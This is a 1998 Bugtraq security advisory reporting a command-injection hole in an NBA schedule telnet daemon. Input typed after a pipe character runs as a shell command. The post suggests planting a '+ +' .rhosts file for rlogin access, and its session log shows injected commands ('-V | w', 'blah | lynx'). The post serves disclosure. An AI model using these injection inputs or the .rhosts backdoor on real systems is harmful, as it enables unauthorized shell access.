[8000] in bugtraq
NBA 4.9 Allows Shell Access
daemon@ATHENA.MIT.EDU (HD Moore)
Mon Sep 21 13:29:43 1998
Date: Sun, 20 Sep 1998 19:23:06 -0500
Reply-To: HD Moore <hdmoore@USA.NET>
From: HD Moore <hdmoore@USA.NET>
To: BUGTRAQ@NETSPACE.ORG
Recently browsing the internet I came upon a link to telnet to a host on
port 859, apparently a NBA (National Basketball Association) telnet
daemon for showing game schedules, while I am not sure who wrote it, or
who uses it, it does create a major secuity hole on the machine it is
running. At login, you recieve a prompt that looks like <nba>, if you
type anything then the 'pipe' character "|" followed by a shell comand,
that command is executed. Doing this you could create a .rhosts file
containing the classic "+ +", then giving shell access through rlogin.
It is also possible to start lynx ( or some other program), then break
out into a shell from that program. If anyone knows the origin of this
program, or someone who uses it, please alert them to this fact. Please
no flames concerning how stupid of a bug this is, it is still a bug =)
Below is a cut from a session log:
usage: /usr/local/bin/nba [-vh] [-nNUM] [-HA] [-C] [-E[d|w]] [-U[d|w]]
[TEAM|DIV
[TEAM|DIV]] [mm/dd...]
With -v, print version information and exit.
This is version 4.9 for NBA 95-96.
With -h, print this help message and exit.
With no teams or divisions specified, print next NUM days (default=1)
of
of league schedule from given date(s) (default is today if none
given).
With one team or division, print next NUM games (default=3) for that
team
or teams in that division.
With two teams or divisions, print games where first team (or team
in first division) plays second team (or team in second division).
-H or -A: Print only home or away games, for first team or division.
-C: Print monthly calendar format (specify month or default is
current).
-E: Use European dates (dd/mm) and weeks (starting on Monday).
-U: Use U.S. dates (mm/dd) and weeks (starting on Sunday).
Teams can specified with or without leading -t, from the following
list:
atl - Atlanta bos - Boston cha - Charlotte
chi - Chicago cle - Cleveland dal - Dallas
den - Denver det - Detroit gol - Golden State
hou - Houston ind - Indiana lac - LA Clippers
lal - LA Lakers mia - Miami mil - Milwaukee
min - Minnesota nj - New Jersey ny - New York
orl - Orlando phi - Philadelphia pho - Phoenix
por - Portland sac - Sacramento san - San Antonio
sea - Seattle tor - Toronto uta - Utah
van - Vancouver was - Washington
Divisions can specified with or without a leading -d, from the
following list:
pac - Pacific mid - Midwest ctl - Central
atc - Atlantic
The season runs from 11/3 to 4/21.
<nba> -V | w
/usr/local/bin/nba: unknown team or division code: -V
18:00 up 18 days, 14:14, 3 users, load average: 0.29, 0.96, 0.94
User tty from login@ idle JCPU PCPU what
xxxxxx p6 lichen 13:17 3days -ksh
xxxxxx p0 zlin 14:25 5days -tcsh
xxxxxx p7 petrie 15:13 2days 24:46 14 -csh
<nba> blah | lynx
